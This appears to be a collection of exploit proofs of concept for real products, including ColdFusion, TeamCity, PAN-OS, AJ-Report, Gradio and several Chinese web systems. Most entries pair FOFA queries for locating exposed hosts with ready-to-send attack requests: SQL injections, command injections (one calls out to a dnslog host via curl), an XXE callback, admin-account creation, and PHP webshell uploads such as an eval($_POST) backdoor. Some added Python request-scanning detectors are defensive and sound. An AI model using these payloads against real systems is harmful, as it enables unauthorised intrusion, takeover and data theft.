Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

A DNS/HTTP callback on the dnslog host confirms that the external entity was resolved.

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 Update 17 and earlier, 2021 Update 7 and earlier, 2023 Update 1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid from the server manager heartbeat endpoint
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 in the uuid header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

Note that the request carries no session at all, only the client-chosen user_name/user_id cookies.

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin console: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

The orderBy value is concatenated into the ORDER BY clause; a 3-second delay confirms that the database name is 11 characters long (time-based blind injection).

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "USERNAME", "password": "PASSWORD", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

The request to a non-existent path with ?jsp=/app/rest/users;.jsp is forwarded internally to the REST users endpoint without authentication and creates a SYSTEM_ADMIN user.

CVE-2024-27199 (path traversal to authenticated pages)
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

The injection point is the IPAddr field inside the JSON string carried in messagecontent; the database version comes back in the updatexml error message.

135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat /api/cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun (科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak default credentials
CVE-2024-29666
FOFA:body="/808gps/"
Credentials: admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= decodes to id).
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog address>`;
Accept-Encoding: gzip

The traversal in the SESSID value creates a file whose name contains the backtick command under the device_telemetry directory; the command runs later, when the telemetry job processes that file name, so confirm via the dnslog callback rather than the HTTP response.

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

url=cnRzcDovL2EK is base64 for rtsp://a; the decoded transport value is || (echo '[S]'; id; echo '[E]')#; and the command output appears between [S] and [E] in the response.

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / server-side template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

The ;swagger-ui/ path parameter is what bypasses authentication: the login check whitelists swagger paths by substring, while the framework strips the ;... parameter before routing and still dispatches to /dataSetParam/verification. The validationRules script is evaluated server-side and its return value (the command output) is sent back in the response.

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

The same ;swagger-ui/ trick as in 149 and 150 reaches the pageList endpoint without a login; the request shown only demonstrates the unauthenticated access.

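Entries 126, 132, 147 and 149 to 151 share one root cause: the authorization check sees a different path from the one the back end finally serves, either because a ;... path parameter (which Tomcat and Spring strip before routing) makes the URI look whitelisted, or because ../ segments are collapsed only after the check (or, for the file servers, never). The Python below is an added example written for this article, not code from TeamCity, AJ-Report, aiohttp or RaidenMAILD: it canonicalises a request target the way the back end will and flags requests whose canonical form lands on a protected prefix while the raw form did not look like it. PROTECTED_PREFIXES and the sample request lines are constructed for the example; an operator would list their own deployment's paths.

```python
import re
from urllib.parse import unquote, urlsplit

# Paths that must only be reachable after authentication.  These prefixes are
# assumed for the example; an operator would list their own deployment's.
PROTECTED_PREFIXES = ("/app/rest/", "/admin/", "/dataSetParam/", "/dataSource/",
                      "/etc/", "/windows/")

DOT_DOT = re.compile(r"(^|/)\.\.(/|$)")


def canonical_path(raw_path):
    """Reduce a request path to what the back end will actually serve.

    Covers the tricks in the POCs above: percent-encoding (decoded twice to
    catch double encoding), ';...' path parameters on any segment (Tomcat and
    Spring strip them, so '/app/rest/users;.jsp' is '/app/rest/users' and
    '/;swagger-ui/x' is '/x'), and '.'/'..' segments.  Returns (path, climbed);
    climbed is True when '..' tried to rise above '/'.
    """
    decoded = unquote(unquote(raw_path))
    segments, climbed = [], False
    for seg in decoded.split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            else:
                climbed = True
            continue
        segments.append(seg)
    return "/" + "/".join(segments), climbed


def candidate_paths(request_target):
    """The request path plus any path smuggled through TeamCity's 'jsp' query
    parameter (CVE-2024-27198 forwards the request to that value)."""
    parts = urlsplit(request_target)
    candidates = [parts.path]
    for kv in parts.query.split("&"):  # split on '&' only, never on ';'
        key, _, value = kv.partition("=")
        if key == "jsp":
            candidates.append(unquote(value))
    return candidates


def findings(request_target):
    """Sorted tags for one request-target string:
    'path-param'  a ';' parameter changed the path once canonicalised
    'traversal'   '..' segments are present (or tried to climb past '/')
    'protected'   the canonical path lands under PROTECTED_PREFIXES
    """
    tags = set()
    for raw in candidate_paths(request_target):
        decoded = unquote(unquote(raw))
        canon, climbed = canonical_path(raw)
        if ";" in decoded and canon != decoded:
            tags.add("path-param")
        if climbed or DOT_DOT.search(decoded):
            tags.add("traversal")
        if canon.startswith(PROTECTED_PREFIXES):
            tags.add("protected")
    return sorted(tags)


# Constructed request lines mirroring entries 126, 132, 147, 149 and 151.
SAMPLE_TARGETS = [
    "/static/../../../../../etc/passwd",                      # aiohttp
    "/pwned?jsp=/app/rest/users;.jsp",                        # TeamCity 27198
    "/res/../admin/diagnostic.jsp",                           # TeamCity 27199
    "/webeditor/../../../windows/win.ini",                    # RaidenMAILD
    "/dataSetParam/verification;swagger-ui/",                 # AJ-Report RCE
    "/;swagger-ui/dataSource/pageList?showMoreSearch=false",  # AJ-Report SQLi
    "/login?next=%2Fhome",                                    # benign
]

if __name__ == "__main__":
    for target in SAMPLE_TARGETS:
        print(f"{target:58s} {findings(target)}")
```

Run it over an access log's request-target column: a 'protected' tag together with 'path-param' or 'traversal' is the pattern of every POC above, and a 200 on such a request from an unauthenticated client is the thing to alert on. The check works on the canonical form, so it is not fooled by double-encoding or by putting the ; parameter on a different segment than the POC used.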
152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected: LoadMaster <= 7.2.59.2 (GA), LoadMaster <= 7.2.54.8 (LTSF), LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
The Basic credential JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, i.e. the username field carries the injected shell command.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the server copy /etc/passwd into its temporary cache directory
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy through the /file= route
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

The back end is PostgreSQL (PG_SLEEP); a 5-second delay in the response confirms the injection in the query.gsdwid field of the JSON body.

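Most of the injections collected above hide the payload under one or more encoding layers before it reaches the vulnerable sink: base64 in a query parameter (122) or in a Basic credential (152) or in a command parameter (144), percent-encoding (137 to 140, 146), JSON nested inside a form field and then again inside a JSON string (134), JSON bodies (149, 150, 154), cookies (145), Velocity/OGNL escapes (123) and DTD entities (127). A scanner that only greps the raw request misses most of them. The Python below is an added example written for this article, not a tool from any vendor or project: it peels those layers off every query value, body field, cookie and Basic credential, then applies a deliberately small signature set. The signature set, the sample requests and the dnslog placeholder are all constructed for the example.

```python
import base64
import json
import re
from urllib.parse import unquote_plus, urlsplit

# Signature families for the injection POCs above: deliberately small and
# illustrative, not a production rule set.
SIGNATURES = {
    "sqli": re.compile(r"(?i)(union\s+all\s+select|\bselect\b.+\bfrom\b"
                       r"|\b(sleep|pg_sleep|updatexml|extractvalue|database|version)\s*\()"),
    "cmdi": re.compile(r"(`[^`]+`|\$\{IFS\}|\|\|\s*\(|;\s*(id|ls|cat|curl|wget)\b)"),
    "expr": re.compile(r"(#request\b|@org\.apache\.struts2|freemarker\.template\.utility"
                       r"\.Execute|java\.lang\.ProcessBuilder)"),
    "xxe": re.compile(r"<!ENTITY\b|<!DOCTYPE[^>]*\bSYSTEM\b"),
}
# A bare command is only suspicious once unwrapped from base64 (D-Link's
# system=aWQ=); the same text in a plain parameter would be far too noisy.
B64_COMMAND = re.compile(r"^\s*(id|ls|cat|whoami|uname|curl|wget)\b")
B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def json_strings(node):
    """Yield every string leaf of a parsed JSON document."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, (dict, list)):
        for child in (node.values() if isinstance(node, dict) else node):
            yield from json_strings(child)


def expand(value, chain=()):
    """Yield (text, decoders_applied) for value and every layer hidden in it:
    repeated URL-decoding, base64 that decodes to printable text, and string
    leaves of embedded JSON, recursively (JSON inside a JSON string too)."""
    if len(chain) > 4:
        return
    yield value, chain
    decoded = unquote_plus(value)
    if decoded != value:
        yield from expand(decoded, chain + ("url",))
    s = value.strip()
    if len(s) >= 4 and B64.match(s):
        try:
            text = base64.b64decode(s + "=" * (-len(s) % 4), validate=True).decode("utf-8")
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            text = ""
        if text and all(c.isprintable() or c in "\r\n\t" for c in text):
            yield from expand(text, chain + ("base64",))
    if s[:1] in ("{", "["):
        try:
            doc = json.loads(s)
        except ValueError:
            return
        for leaf in json_strings(doc):
            yield from expand(leaf, chain + ("json",))


def form_values(encoded):
    """Values of a k=v&k=v string, split on '&' only."""
    return [unquote_plus(kv.partition("=")[2]) for kv in encoded.split("&") if kv]


def scan_request(target, headers, body=""):
    """Return {family: [evidence, ...]} for one request (headers is a dict).
    Inspects query values, the body (form-decoded, or raw for JSON, XML and
    multipart), every cookie value and the Basic-auth credential."""
    fields = form_values(urlsplit(target).query)
    if body:
        is_form = headers.get("Content-Type", "").startswith("application/x-www-form-urlencoded")
        fields += form_values(body) if is_form else [body]
    fields += [c.partition("=")[2].strip() for c in headers.get("Cookie", "").split(";") if "=" in c]
    auth = headers.get("Authorization", "")
    if auth.lower().startswith("basic "):
        fields.append(auth[6:].strip())  # expand() base64-decodes it
    hits = {}
    for field in fields:
        for layer, chain in expand(field):
            for family, rx in SIGNATURES.items():
                if rx.search(layer):
                    hits.setdefault(family, set()).add(layer.strip()[:60])
            if "base64" in chain and B64_COMMAND.match(layer):
                hits.setdefault("cmdi", set()).add(layer.strip()[:60])
    return {k: sorted(v) for k, v in hits.items()}


# Constructed samples modelled on entries 122, 134, 144, 145, 152 and 154;
# the dnslog host is a placeholder.
FORM = {"Content-Type": "application/x-www-form-urlencoded"}
SAMPLES = [
    ("122 base64 sql", "/importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql", {}, ""),
    ("134 json-in-form", "/protocol/index.php", FORM,
     r'''jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\"}"]}'''),
    ("144 base64 cmd", "/cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ=", {}, ""),
    ("145 cookie", "/global-protect/login.esp",
     {"Cookie": "SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/x`curl${IFS}dnslog.invalid`;"}, ""),
    ("152 basic auth", "/access/set?param=enableapi&value=1", {"Authorization": "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="}, ""),
    ("154 json body", "/twms-service-mfs/mfsNotice/page", {"Content-Type": "application/json"},
     '''{"currentPage":1,"query":{"gsdwid":"1') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('a'='a"}}'''),
]

if __name__ == "__main__":
    for label, target, headers, body in SAMPLES:
        print(f"{label:18s} {scan_request(target, headers, body)}")
```

The evidence strings are the decoded layer that matched, which is what an analyst needs to see: for 122 it is the SQL statement rather than the base64 blob, for 152 it is the username ';ls;':doesnotmatter rather than the Authorization header. The base64 branch is kept deliberately strict (valid alphabet, printable UTF-8 result) so that ordinary hex session ids and short words do not produce phantom layers.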
155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the path returned in the response, e.g. http://x.x.x.x/files/upload/img_664ab7fd14d2c.php (the upload is renamed but keeps its .php extension).

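Entries 121, 130, 133, 155 and 157 are the same weakness: a multipart upload handler that trusts the client-supplied filename and Content-Type, so a PHP or JSP file declared as image/png (or as application/octet-stream) is stored with its executable extension. The Python below is an added example written for this article, not code from any of those products: it parses a multipart/form-data body and flags parts whose filename carries a server-side extension anywhere in its dotted name, whose declared image type is not backed by image magic bytes, or whose content contains a PHP/JSP/ASP tag. The boundary and body are constructed for the example, modelled on entry 155; the extension list is an assumption an operator would adjust for their stack.

```python
import re

# Extensions a web server may execute; assumed list, extend for your stack.
EXECUTABLE_EXT = {"php", "php3", "php5", "phtml", "phar", "jsp", "jspx",
                  "asp", "aspx", "ashx", "asmx", "cer", "cshtml"}
SERVER_TAGS = (b"<?php", b"<?=", b"<%")
IMAGE_MAGIC = (b"\x89PNG", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")
DISPOSITION = re.compile(r'name="([^"]*)"(?:.*?filename="([^"]*)")?', re.S)


def parse_multipart(body, boundary):
    """Split a multipart/form-data body (bytes) into parts.

    Each part is a dict with name, filename (None for plain fields),
    content_type and data (bytes).  CRLF and bare-LF bodies are both accepted.
    """
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):  # closing delimiter
            break
        chunk = chunk.lstrip(b"\r\n")
        head, sep, data = chunk.partition(b"\r\n\r\n")
        if not sep:
            head, _, data = chunk.partition(b"\n\n")
        headers = {}
        for line in head.decode("latin-1").splitlines():
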